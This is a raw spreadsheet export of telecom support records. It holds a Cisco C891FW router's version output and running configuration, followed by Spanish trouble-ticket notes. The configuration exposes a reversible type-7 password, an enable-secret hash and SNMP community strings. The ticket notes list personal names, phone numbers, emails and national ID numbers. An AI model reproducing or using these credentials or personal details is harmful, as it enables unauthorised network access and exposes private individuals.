MINSA_ROSARIO_LACAYO_LEON#SHO VER
CISCO IOS SOFTWARE, C800 SOFTWARE (C800-UNIVERSALK9-M), VERSION 15.3(3)M6, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED TUE 04-AUG-15 05:50 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.4(1R)T1, RELEASE SOFTWARE (FC1)
MINSA_ROSARIO_LACAYO_LEON UPTIME IS 38 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C800-UNIVERSALK9-MZ.SPA.153-3.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W-A-K9 (REVISION 1.0) WITH 357452K/35763K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2032L30H
1 FASTETHERNET INTERFACE
10 GIGABIT ETHERNET INTERFACES
1 SERIAL INTERFACE
1 ISDN BASIC RATE INTERFACE
2 TERMINAL LINES
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
1 CISCO EMBEDDED AP (S)
DRAM CONFIGURATION IS 32 BITS WIDE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        C891FW-A-K9           FJC2032L30H
LICENSE INFORMATION FOR 'C800'
    LICENSE LEVEL: ADVIPSERVICES   TYPE: PERMANENT
    NEXT REBOOT LICENSE LEVEL: ADVIPSERVICES
CONFIGURATION REGISTER IS 0X2102
MINSA_ROSARIO_LACAYO_LEON#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2823 BYTES
!
VERSION 15.3
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG UPTIME
NO SERVICE TIMESTAMPS LOG UPTIME
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME MINSA_ROSARIO_LACAYO_LEON
!
BOOT-START-MARKER
BOOT-END-MARKER
!
AQM-REGISTER-FNF
!
ENABLE SECRET 5 $1$4VN5$6LGA2SYEQOSCHB/ZXV.ZK.
!
NO AAA NEW-MODEL
SERVICE-MODULE WLAN-AP 0 BOOTIMAGE AUTONOMOUS
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
!
!
LICENSE UDI PID C891FW-A-K9 SN FJC2032L30H
!
!
USERNAME SOPORTE PASSWORD 7 0832435E060B1112
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE BRI0
 NO IP ADDRESS
 ENCAPSULATION HDLC
 SHUTDOWN
 ISDN TERMINATION MULTIDROP
!
INTERFACE FASTETHERNET0
 NO IP ADDRESS
 SHUTDOWN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 NO IP ADDRESS
 DUPLEX FULL
 SPEED 100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IP ADDRESS 10.29.27.152 255.255.255.240
 DUPLEX FULL
 SPEED 100
!
INTERFACE WLAN-GIGABITETHERNET8
 NO IP ADDRESS
!
INTERFACE WLAN-AP0
 DESCRIPTION EMBEDDED SERVICE MODULE INTERFACE TO MANAGE THE EMBEDDED AP
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN_MINSA_ROSARIO_LACAYO_LACAYO
 IP ADDRESS 172.16.136.129 255.255.255.192
 IP FLOW INGRESS
 IP FLOW EGRESS
 LOAD-INTERVAL 30
 NO AUTOSTATE
!
INTERFACE ASYNC3
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP FLOW-EXPORT SOURCE VLAN1
IP FLOW-EXPORT VERSION 9
IP FLOW-EXPORT DESTINATION 192.168.100.222 2055
!
IP ROUTE 0.0.0.0 0.0.0.0 10.29.27.145
!
LOGGING HOST 192.168.100.222
MAC-ADDRESS-TABLE AGING-TIME 20
!
SNMP-SERVER COMMUNITY $1L@1$ RO 39
SNMP-SERVER COMMUNITY MINSA-MONITOR RO
SNMP-SERVER HOST 172.16.1.2 VERSION 2C MINSA
SNMP-SERVER HOST 192.168.100.222 VERSION 2C MINSA
ACCESS-LIST 29 REMARK LECTURA SNMP RO MINSA
ACCESS-LIST 29 PERMIT 172.16.1.2
ACCESS-LIST 29 PERMIT 192.168.100.222
ACCESS-LIST 39 REMARK SOLAR_WINDS 39
ACCESS-LIST 39 PERMIT 190.212.133.254
ACCESS-LIST 39 PERMIT 192.168.0.2
!
CONTROL-PLANE
!
!
!
MGCP BEHAVIOR RSIP-RANGE TGCP-ONLY
MGCP BEHAVIOR COMEDIA-ROLE NONE
MGCP BEHAVIOR COMEDIA-CHECK-MEDIA-SRC DISABLE
MGCP BEHAVIOR COMEDIA-SDP-FORCE DISABLE
!
MGCP PROFILE DEFAULT
!
!
!
!
!
LINE CON 0
 EXEC-TIMEOUT 30 0
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 NO MODEM ENABLE
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE 3
 MODEM INOUT
 SPEED 115200
 FLOWCONTROL HARDWARE
LINE VTY 0 4
 EXEC-TIMEOUT 30 0
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
MINSA_ROSARIO_LACAYO_LEON#</t>
  </si>
  <si>
    <t>EN NODO SE DA RESET FISICO A TRANSEIVER ENLACE RESTABLECE</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO NO SE LOGRA INGRESAR A PE DESDE RED TORRE CLAROP TECNIOCO SE TRASLADA A CLIENTE PARA VALIDAR CONEXIONES</t>
  </si>
  <si>
    <t>F4602677</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON PARA VALIDAR TEMA DE ENERGIA SIN EMBARGO NO SE COMPLETA LLAMADA-
5948-3882</t>
  </si>
  <si>
    <t>SE  ENVIA CORREO A CLEINTE SOLICITANDO ACCESOS
GESTION DE ACCESOS F4602677| 894900013T | MINISTERIO PUBLICO. | CENTRO DE LA POBLACIÓN, SOLOLA, SANTA CRUZ LA LAGUNA 14.743767, -91.206871
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:NOCSE@MP.GOB.GT
CC:CNOCCA;GRUPO N1
MIÉ 15/06/2022 16:47
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4602677| 894900013T | MINISTERIO PUBLICO.  | CENTRO DE LA POBLACIÓN, SOLOLA, SANTA CRUZ LA LAGUNA 14.743767, -91.206871
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
TECNICO 	IBM	DPI
RODRÌGUEZ ROCCHE, AGAPITO	715823	1873445660718
JOSE DAVID NAVICHOC	66033	2225806230718
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON AL 5948-3882 INDICA QUE SI CUENTAN CON ENERGIA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001344946
**</t>
  </si>
  <si>
    <t>F4602690</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARJORY CORDON 45356287 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001357893
**</t>
  </si>
  <si>
    <t>F4602693</t>
  </si>
  <si>
    <t>INFORMA CLIENTE SAMUEL ECHEVERRIA 25232806 / 25232800 QUE ÚNICAMENTE TIENE PROBLEMA CON UNA EXTENSIÓN, EL CUAL NO DA TONO, SE LE COMENTA QUE A NIVEL DE CLARO EL E1 NO PRESENTA INCONVENIENTE, Y LA FALLA DEBE REPORTARLA A SU PROVEEDOR DE LA PBX PARA QUE REVISEN LA PBX O QUE SE REVISEN LA LINEA DE MANERA INTERNA. CLIENTE ENTERADO ESCALARÁ CON SU PROVEEDOR, AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050325232806
NÚMERO: 0050325232806
INICIO: HOY, 12:26 P. M.
FIN: HOY, 12:28 P. M.
DURACIÓN: 2:13
ID DE LLAMADA: 3001345013</t>
  </si>
  <si>
    <t>F4602706</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE FERNANDO HERNÁNDEZ 70744583 PARA VALIDAR CUAL ES EL INCONVENIENTE, CLIENTE INDICA QUE EL SERVICIO LE FALLO A LAS 10 AM REALIZARON PRUEBAS Y LO ENCONTRARON CAIDO RESTABLECIO 30 MIN DESPUES DE ESTO, CLIENTE REALIZA PRUEBAS DE LLAMADAS EN ESTE MOMENTO, COMPLETANDO SIN NINGUN PROBLEMA, CLIENTE SOLICITA QUE EL SERVICIO SE MANTENGA BAJO OBSERVACION Y QUE SE LE CONTACTE A LAS 14:30 HRS PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS CONTESTA LA SRITA DE RECEPCION QUIEN INDICA QUE NO HA PRESENTADO PROBLEMAS, INDICA QUE NOS TRANSFERIRA AL AREA DE SOPORTE PARA APOYO CON EL PROBLEMA QUE ESTAN REPORTANDO EN DADO CASO NO CONTESTEN INDICA QUE SE LE CONTACTE A 22061712
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>QUIEN INDICA QUE EL SERVICIO SE HA MANTENIDO OPERATIVO, SE LE EXPLICA DE LA ALARMA DE CAIDA EN LA MAÑANA, CLIENTE ESTA CONFORME, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE FERNANDO HERNÁNDEZ 70744583 PARA VALIDAR EL ESTADO DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602717</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ILEANA MIRANDA 77434757 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001387387</t>
  </si>
  <si>
    <t>F4602724</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE LEON  78539383 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001854746</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RENE LEON  AL 78539383 SIGUE SIN RESPONDER SE INTENTARA LUEGO**
-ID 3001812056
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RENE LEON  AL 78539383 SIGUE SIN RESPONDER SE INTENTARA LUEGO**
-ID 3001796536
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE LEÓN AL 78539383  NO RESPONDE ||ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001646101
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CL RENE LEON 78539383 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001766879
**</t>
  </si>
  <si>
    <t>F4602747</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANA GABRIELA VELA 41302479 MENCIONA QUE PERSSTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001346137</t>
  </si>
  <si>
    <t>###SE TIENE A CLIENTE EN LINEA##SE DIRIGE HACIA EQUIPOS ## NOS MANTIENE EN LINEA
3001347738
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7764
DURACIÓN: 0:04:36
ESTADO: CONECTADA
DETALLES: 7764
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/06/2022 12:39:10</t>
  </si>
  <si>
    <t>F4602760</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE DIEGO HERNANDEZ 31916100 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA A LAS 14 HRS
-ID 3001355431</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO HERNANDEZ 31916100 MENCIONA QUE TODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA MAÑANA A LAS 10:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 3001384454</t>
  </si>
  <si>
    <t>F4602773</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO EL FUNCIONAMIENTO
DE: SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 12:58
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
CC: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SHEYLIN DIGNA LAZO NUÑEZ &lt;SHEYLIN.LAZO@GMGZF.COM&gt;; ELIAS JOSE ESPINOZA MENDEZ &lt;ELIAS.ESPINOZA@GMGZF.COM&gt;; CRISTIAN MARTIN MENDEZ GONZALEZ &lt;CRISTIAN.MENDEZ@GMGZF.COM&gt;
ASUNTO: TICKET#202206148947 ¿ TIENDA 152 SIN RED
BUENAS TARDES, TIENDA CON ENLACE OPERATIVO.
SALUDOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE CONFIRMA ENLACE OPERATIVO, SE LE RESPONDE*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 13:29
PARA: 'SERVICEDESKTI' &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
CC: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SHEYLIN DIGNA LAZO NUÑEZ &lt;SHEYLIN.LAZO@GMGZF.COM&gt;; ELIAS JOSE ESPINOZA MENDEZ &lt;ELIAS.ESPINOZA@GMGZF.COM&gt;; CRISTIAN MARTIN MENDEZ GONZALEZ &lt;CRISTIAN.MENDEZ@GMGZF.COM&gt;
ASUNTO: RE: TICKET#202206148947 ¿ TIENDA 152 SIN RED
BUENAS TARDES ESTIMADOS,
            AGRADECEMOS POR SU CONFIRMACIÓN, SOLICITAMOS DE SU APOYO EN AUTORIZARNOS PROCEDER CON EL CIERRE DEL TICKET POR FAVOR.
QUEDAMOS ATENTOS A SU RESPUESTA.
------------------------------------------------
DE: SERVICEDESKTI [MAILTO:SERVICEDESK@GRUPOMONGE.COM]
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 12:59
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
CC: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SHEYLIN DIGNA LAZO NUÑEZ &lt;SHEYLIN.LAZO@GMGZF.COM&gt;; ELIAS JOSE ESPINOZA MENDEZ &lt;ELIAS.ESPINOZA@GMGZF.COM&gt;; CRISTIAN MARTIN MENDEZ GONZALEZ &lt;CRISTIAN.MENDEZ@GMGZF.COM&gt;
ASUNTO: TICKET#202206148947 ¿ TIENDA 152 SIN RED
BUENAS TARDES, TIENDA CON ENLACE OPERATIVO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELIZABETH SANCHEZ 50684200556 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001350083 - 3001350462</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 12:53
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;
CC: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SHEYLIN DIGNA LAZO NUÑEZ &lt;SHEYLIN.LAZO@GMGZF.COM&gt;; ELIAS JOSE ESPINOZA MENDEZ &lt;ELIAS.ESPINOZA@GMGZF.COM&gt;; CRISTIAN MARTIN MENDEZ GONZALEZ &lt;CRISTIAN.MENDEZ@GMGZF.COM&gt;
ASUNTO: RE: TICKET#202206148947 ¿ TIENDA 152 SIN RED
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4602774</t>
  </si>
  <si>
    <t>-* SE REALIZA CONFERENCIA DE PR CON LUIS IXCOT (GESTOR) A LA ESPERA DE LO QUE DETERMINEN -*
************************************************************______************************************************************
 15/06/2022 13:48:18 GUATEMALA/CENTRO AMERICA (ELDER JOSUE LOPEZ CHAVEZ):
-* JORGE  MAX 51536638 (CLIENTE) BRINDA CONTACTO EN PR BENNER LOPEZ 41443159, RESPONDE E INDICA QUE ESTA EN SITIO -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JORGE  MAX 51536638 PARA BRINDAR RETROALIMENTACION
-ID 3001490179 - 3001490376</t>
  </si>
  <si>
    <t>F4602777</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TÉCNICO WILDER RICO QUIEN INDICA QUE YA SE ENCUENTRA EN SITIO CLIENTE, MÁS SIN EMBARGO NO SE LE HA BRINDADO EL ACCESO , SE LLAMA A CLIENTE , PARA INDICARLE QUE TÉCNICO YA SE ENCUENTRA EN SITIO, CLIENTE, INDICA QUE AUTORIZARA EL PERMISO DE INGRESO
3001395518
COLA:
NOMBRE: A: DIONICIO VELIZ CERON
NÚMERO: 7739
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 7739
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 15/06/2022 14:59:04</t>
  </si>
  <si>
    <t>-* SE REALIZA CONFERENCIA DE PR CON LUIS IXCOT (GESTOR) A LA ESPERA DE LO QUE DETERMINEN -*</t>
  </si>
  <si>
    <t>F4602781</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL HIDALGO  AL 76037049 INFORMA QUE ESTA PROBANDO LOS DNS QUE LE PROPORCIONAMOS, POR EL MOMENTO NO LE FUNCIONARON PORQUE TAMPOCO LE RESUELVEN EN NSLOOKUP, ENVIARA EVIDENCIA DE LOS RESULTADOS VIA CORREO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
ASUNTO: CONFIGURAR DNS SD1135401 || ID1031141 || SEGUROS FEDECREDITO SA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL HIDALGO  AL 76037049 CONFIRMA SI LOS DNS QUE TIENE SON 201.247.155.225 201.247.157.225 || SE CONSULTA CON GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001352545
**</t>
  </si>
  <si>
    <t>F4602782</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ALEJANDRO AL 32387925 INDICA QUE LO QUE ESTA REPORTANDO ES DATOS || SE NOTIFICA A GESTOR **
-ID 3001349079
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ALEJANDRO AL 32387925 SE LE SOLICITA QUE BRINDE LA IP LAN  192.168.112.0 DEL SERVICIO
-ID 3001349079
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ALEJANDRO AL 0050432387925 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001371555
**</t>
  </si>
  <si>
    <t>F4602783</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JULIO SÁNCHEZ/CLIENTE; SE LE INDICA LO DICHO EN CRONO ANTERIOR; CLIENTE MOLESTO PUES YA LLEVA MÁS DE 24 HORAS SIN SERVICIO.
SE ESCALÓ CON EMERSON MAZARIEGOS/TÉCNICO 48475196 INDICA QUE AHORA LLEVA EL CASO HENRY BETANCOUR/PLEX REGIÓN 58261701, EL PRIMERO INDICA QUE DESDE AYER HAY PROBLEMAS CON LA CONFIGURACIÓN DE LOS EQUIPOS EN NODO/CLIENTE.</t>
  </si>
  <si>
    <t>CLIENTE CLAUDIA PEREZ AL 50290746  APLICO REINICO AL EQUIPO ASMI PERO ENLACE NO LEVANTA, ASMI CONTINUA ALARMADO.
PWR: VERDE
ALM: ROJO
USER: VERDE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA PEREZ AL 50290746 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR **
-ID 3001373619
**</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A EMERSON MAZARIEGOS/TÉCNICO CLARO, PEDÍA HABLAR CON GESTOR ASIGNADO PARA PRUEBAS, SE LLAMÓ HASTA 4 VECES A GESTIÓN N1, NO CONTESTAN; NO SE TUVO APOYO TAMPOCO VÍA SKYPE, SE ESCALA CON KEVYN FONSECA/TEAM LEADER N1 INDICA QUE INFORMARÁ A GESTOR PARA QUE SE DEVUELVA LLAMADA A TÉCNICO CLARO EN UNOS 5/10 MINUTOS.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ELIZABETH MONTERROSO/CLIENTE; SE LE INDICA QUE TÉCNICO RETIRÓ EQUIPOS PARA VERIFICAR LA CONFIGURACIÓN DE LOS MISMOS, AVANCES EN 45 MINUTOS.</t>
  </si>
  <si>
    <t>SE ESCALÓ CON HENRY BETANCOUR/PLEX REGIÓN 58261701 INDICA QUE EN ESTE MOMENTO ESTÁ CON GESTIÓN N1 CONFIGURANDO LOS EQUIPOS, PIDE SE LE LLAME EN UNA HORA PARA AVANCES.</t>
  </si>
  <si>
    <t>F4602787</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS PÉREZ CABRERA 59780254 SUENA DESCONECTADO
-ID 3001389925</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS PÉREZ CABRERA 22562435 - 56300942 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO FUNCIONA BIEN POR LO QUE SOLICITA PRUEBAS POR CORREO
LPEREZ@DISTELSA.COM.GT
-ID 3001390285 - 3001390551 - 3001391187</t>
  </si>
  <si>
    <t>F4602788</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTEBAN AL 30246026   CONTESTA EL SEÑOR RENATO LORENZANA SOLICITA QUE SE DEJE EN OBSERVACION PARA EL DIA LUNES POR LA TARDE NO BRINDA HORA**
ID 3001794734
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENATO LORENZANA AL 30246026 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001564109
**</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE GESTIÓN CLARO N1 A LO DICHO EN CRONO ANTERIOR, SE HACE RECORDATORIO DE NUEVO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4602792</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINTIA 55578692 MENCIONA QUE EL SERVICIO YA RESTABLECIO, SE LE BRINDA DIAGNOSTICO Y SOLICITA SE PUEDA COMPARTIR POR CORREO LAS PRUEBAS
JGOMEZ@POPS.COM.GT
-ID 3001393992</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINTIA 55578692 PARA BRINDAR RETROALIMENTACION
-ID  3001424328</t>
  </si>
  <si>
    <t>F4602797</t>
  </si>
  <si>
    <t>CLIENTE ABIGAIL LLAMA DEL 47567063 ID 3001359014 PARA EL SEGUIMIENTO DEL CASO SD1135408  SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS SE TRANSFIERE CON EL GESTOR A CARGO JURGEN.BOCH AL 8126 ID 3001360696 INGRESA LA LLAMADA CON VARIOS GESTORES Y NO RESPONDE EN LA MISMA LLAMADA SE TRASLADAN LAS LLAMADAS AL FIN RESPONDE MIGUEL Y CONTACTA A JURGEN Y SE DEJA CON EL PR EN LINEA.</t>
  </si>
  <si>
    <t>SE BRINDO AVANCES AL CLIENTE DE PR</t>
  </si>
  <si>
    <t>F4602798</t>
  </si>
  <si>
    <t>MARLON OLIVA/CLIENTE INDICA QUE PERSONAL DE PR HACEN TIEMPO HASTA LAS 16:30 HORAS, SI NO DA TIEMPO INDICA QUE SE COORDINE LA VISITA TÉCNICA PARA MAÑANA A LAS 08:00AM; SE LLAMÓ HASTA 3  VECES A GESTIÓN PARA APOYO NO CONTESTAN SE ESCALÓ CON PEDRO TOT/TÉCNICO 58262863 INDICA QUE ESTIMA QUE ESTÉ EN PR EN 15/20 MINUTOS.
SE LE INDICA LO ANTERIOR A CLIENTE, ÉSTE NOS HACE TIEMPO, TÉCNICO ENTERADO; ES SÓLO PARA MEDICIONES, PARA REPARACIONES TÉCNICO INDICA QUE LE PUEDE TOMAR HASTA UNA HORA.</t>
  </si>
  <si>
    <t>LLAMA EL PR MARLON OLIVA LLAMA DEL 37357666 ID 3001389871 PARA EL SEGUIMIENTO DEL CASO SD1135409 SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS SE TRANSFIERE CON EL GESTOR A CARGO LUIS.IXCOTAL 8126 ID 3001391341 ATIENDE MARLON RAMOS  Y COMENTA QUE NO ESTA EL GESTOR Y EL BRINDARA EL APOYO SE DEJA AL PR EN LINEA</t>
  </si>
  <si>
    <t>F4602810</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 16:55
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063 ### ::: TICKET CNOC IMBBL004293 ### ::: LINK DOWN
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE ESTAN A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE
-ID 3001399424</t>
  </si>
  <si>
    <t>F4602831</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EGEL PAREDES, CONFIRMA SERVICIO ESTABLE POR LO QUE AUTORIZA CIERRE DE TICKET
3001430215
COLA:
NOMBRE: A: 34500868
NÚMERO: 34500868
DURACIÓN: 0:00:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 34500868
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 15/06/2022 16:48:04</t>
  </si>
  <si>
